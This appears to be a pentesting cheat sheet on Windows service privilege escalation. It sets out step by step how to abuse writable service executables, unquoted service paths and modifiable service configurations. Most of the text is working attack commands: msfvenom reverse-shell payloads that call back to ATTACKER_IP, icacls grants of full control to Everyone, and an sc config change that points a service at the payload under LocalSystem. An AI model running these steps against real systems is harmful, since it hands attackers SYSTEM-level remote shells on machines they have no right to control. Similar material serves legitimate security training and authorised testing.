Windows Services
Service Configuration Basics
Location of Service Configurations:
HKLM\SYSTEM\CurrentControlSet\Services\Listing All Services:
sc query
1. Insecure Permissions on Service Executable
Steps to Exploit:
Find the Service Executable:
sc qc <SERVICE_NAME>Check Permissions on the Executable:
icacls <EXECUTABLE_PATH>Exploitation Steps (if the user can modify the executable):
Create a Malicious Payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o <SERVICE_EXECUTABLE>Grant Full Permissions (if needed):
icacls <SERVICE_EXECUTABLE> /grant Everyone:FTrigger the Service:
sc stop <SERVICE_NAME> sc start <SERVICE_NAME>
2. Unquoted Service Path Vulnerability
Description:
This vulnerability arises when the executable path of a service is not quoted and contains spaces.
How It Works:
The Service Control Manager (SCM) looks for the executable path recursively in different locations.
Example Path:
C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exeSearch Order:
C:\MyPrograms\Disk.exeC:\MyPrograms\Disk Sorter.exeC:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe(default)
Exploitation Steps:
Create a Malicious Binary:
Name it to match a higher-priority path (e.g.,
C:\MyPrograms\Disk.exe).
Upload and Trigger the Binary:
Restart the service to run the malicious binary:
sc stop <SERVICE_NAME> sc start <SERVICE_NAME>
3. Insecure Service Permissions
Description:
This vulnerability occurs when a user can modify the service configuration.
Steps to Exploit:
Check Service Configuration Rights:
accesschk64.exe -qlc <SERVICE_NAME>Note: Download
accesschkfrom Sysinternals.
Create a Malicious Payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o <EXECUTABLE>Grant Full Permissions on the Payload:
icacls <EXECUTABLE> /grant Everyone:FModify the Service Configuration:
sc config <SERVICE_NAME> binPath= "<EXECUTABLE>" obj= LocalSystemTrigger the Service:
sc stop <SERVICE_NAME> sc start <SERVICE_NAME>
Last updated